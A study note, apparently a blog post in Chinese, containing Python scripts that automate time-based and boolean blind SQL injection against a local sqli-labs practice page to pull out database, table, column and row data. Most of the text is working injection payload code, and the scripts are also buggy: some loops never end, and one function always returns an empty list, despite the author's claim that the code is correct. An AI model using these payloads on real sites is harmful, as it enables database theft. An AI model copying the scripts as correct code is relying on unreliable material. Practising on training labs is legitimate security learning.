sql:时间盲注和boolen盲注
关于时间盲注,boolen盲注的后面几个获取表、列、具体数据的函数补全
时间盲注方法
import time
import requests
# 获取数据库名
def inject_database(url):
dataname = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(3), 0)-- " % (i, mid)
res = {"id": payload}
start = time.time()
r = requests.get(url, params=res)
end = time.time()
if end-start >= 3:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
dataname += chr(mid)
print(dataname)
# 获取表名
def table_inject(url, dataname):
table_name = []
index = 0
while True:
table_name = ""
position = 1
while True:
low = 32
high = 127
while low < high:
mid = (low + high) // 2
payload = f"1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{dataname}' limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "
params = {"id": payload}
start = time.time()
r = requests.get(url, params=params)
end = time.time()
if end - start >= 3:
low = mid + 1
else:
high = mid
if low == 32:
break
table_name += chr(low)
position += 1
# if not table_name:
# break
# table_name.append(table_name)
# index +=1
return table_name
# 获取列名
def colum_inject(url, dataname, table_name):
colum_name = []
index = 0
while True:
colum_name = ""
position = 1
while True:
low = 32
high = 127
while low < high:
mid = (low + high) // 2
payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{dataname}' and table_name='{table_name}' limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "
params = {"id": payload}
start = time.time()
r = requests.get(url, params=params)
end = time.time()
if end-start >= 3:
low = mid + 1
else:
high = mid
if low == 32:
break
colum_name += chr(low)
position += 1
return colum_name
# 获取具体数据
def data_inject(url, dataname, table_name, colum_name):
data = []
index = 0
while True:
row_data = ""
position = 1
while True:
low = 32
high = 127
while low < high:
mid = (low + high) // 2
payload = f"1' and if(ascii(substr((select {colum_name} from {dataname}.{table_name} limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "
params = {"id": payload}
start = time.time()
r = requests.get(url, params=params)
end = time.time()
if end - start >= 3:
low = mid + 1
else:
high = mid
if low == 32:
break
row_data += chr(low)
position += 1
return data
if __name__ == '__main__':
url = 'http://127.0.0.1:8080/sqlilabs/Less-9/'
dataname = inject_database(url)
print(f"database: {dataname}")
table_names = table_inject(url, dataname)
print(f"table-name: {table_names}")
if table_names:
table_name = table_names[0]
colum_names = colum_inject(url, dataname, table_name)
print(f"colum-name: {colum_names}")
if colum_names:
colum_name = colum_names[0]
data = data_inject(url, dataname, table_name, colum_name)
print(f"时间盲注 - 具体数据: {data}")
布尔盲注方法
import requests
# 通用的布尔盲注函数
def boolen_inject(url, payload, payloadfas, params):
result = ""
for pos in range(1, 20):
for ascii_val in range(32, 127):
payload_true = payload.format(pos, ascii_val)
payload_false = payloadfas.format(pos, ascii_val)
params_true = {params: payload_true}
params_false = {params: payload_false}
response_true = requests.get(url, params=params_true)
response_false = requests.get(url, params=params_false)
if response_true.text != response_false.text:
result += chr(ascii_val + 1)
break
else:
break
return result
# 布尔盲注获取数据库名
def get_database_name(url, params):
payload = "1' and ascii(substr(database(), {}, 1)) > {} -- "
payloadfas = "1' and ascii(substr(database(), {}, 1)) <= {} -- "
return boolen_inject(url, payload, payloadfas, params)
# 布尔盲注获取表名
def table_inject(url, params, database_name):
table_names = []
index = 0
while True:
payload = (
f"1' and ascii(substr((select table_name from information_schema.tables "
f"where table_schema='{database_name}' limit {index}, 1), {{}}, 1)) > {{}} -- "
)
payloadfas = (
f"1' and ascii(substr((select table_name from information_schema.tables "
f"where table_schema='{database_name}' limit {index}, 1), {{}}, 1)) <= {{}} -- "
)
table_name = boolen_inject(url, payload, payloadfas, params)
if not table_name:
break
table_names.append(table_name)
index += 1
return table_names
# 布尔盲注获取列名
def column_inject(url, params, database_name, table_name):
column_names = []
index = 0
while True:
payload = (
f"1' and ascii(substr((select column_name from information_schema.columns "
f"where table_schema='{database_name}' and table_name='{table_name}' limit {index}, 1), {{}}, 1)) > {{}} -- "
)
payloadfas = (
f"1' and ascii(substr((select column_name from information_schema.columns "
f"where table_schema='{database_name}' and table_name='{table_name}' limit {index}, 1), {{}}, 1)) <= {{}} -- "
)
column_name = boolen_inject(url, payload, payloadfas, params)
if not column_name:
break
column_names.append(column_name)
index += 1
return column_names
# 布尔盲注获取具体数据
def data_inject(url, params, database_name, table_name, column_name):
data = []
index = 0
while True:
payload = (
f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index}, 1), {{}}, 1)) > {{}} -- "
)
payloadfas = (
f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index}, 1), {{}}, 1)) <= {{}} -- "
)
row_data = boolen_inject(url, payload, payloadfas, params)
if not row_data:
break
data.append(row_data)
index += 1
return data
if __name__ == '__main__':
url = "http://127.0.0.1:8080/sqlilabs/Less-9/index.php"
params = "id"
# 获取数据库名
database_name = get_database_name(url, params)
print(f"database_name: {database_name}")
# 获取表名
table_names = table_inject(url, params, database_name)
print(f"table_name: {table_names}")
if table_names:
table_name = table_names[0]
# 获取列名
column_names = column_inject(url, params, database_name, table_name)
print(f"column_name: {column_names}")
if column_names:
column_name = column_names[0]
# 获取具体数据
data = data_inject(url, params, database_name, table_name, column_name)
print(f"data: {data}")
实验结论
但是两种方式都显示不了数据库名称,检查后发现是基础配置问题导致代码连接不上,正常在网址上进入是可以的。
代码本身没有问题。
现在我还没有找到问题所在,后面会抽时间改进。